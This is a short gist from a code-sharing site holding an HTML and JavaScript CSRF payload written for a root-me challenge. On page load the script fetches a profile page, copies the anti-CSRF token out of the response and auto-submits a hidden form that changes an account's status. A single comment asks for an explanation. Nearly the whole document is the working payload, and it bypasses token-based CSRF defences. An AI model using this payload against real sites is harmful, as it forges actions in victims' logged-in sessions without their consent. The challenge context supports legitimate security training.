@vkobel
Created February 19, 2016 09:58
CSRF payload for token based mechanism (root-me sample)
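<body onload="get()">
  <!-- Hidden form posted to the profile action once the token field has been filled in -->
  <form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="username" value="your_username"/>
    <input type="hidden" name="status" value="on"/>
    <input type="hidden" id="forged-token" name="token" value=""/>
    <input type="submit" value="go"/>
  </form>
  <script>
    var x = new XMLHttpRequest();

    // Runs on page load: request the profile page, whose HTML embeds the current anti-CSRF token.
    // The URL is relative, so the request goes to the origin serving this markup; the
    // same-origin policy lets the script read the response only in that case.
    function get() {
      x.open("GET", "?action=profile", true);
      x.send(null);
    }

    // Once the response has arrived, copy the token out of the returned HTML
    // into the hidden field and submit the form.
    x.onreadystatechange = function() {
      if (x.readyState == XMLHttpRequest.DONE) {
        var token = x.responseText.match(/name="token" value="(.+)"/)[1];
        document.getElementById("forged-token").value = token;
        document.getElementById("form-payload").submit();
      }
    };
  </script>
</body>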
@Matias-ISCTEIUL

I tried everything! I even copied this and got nothing. Can you explain it to me please?
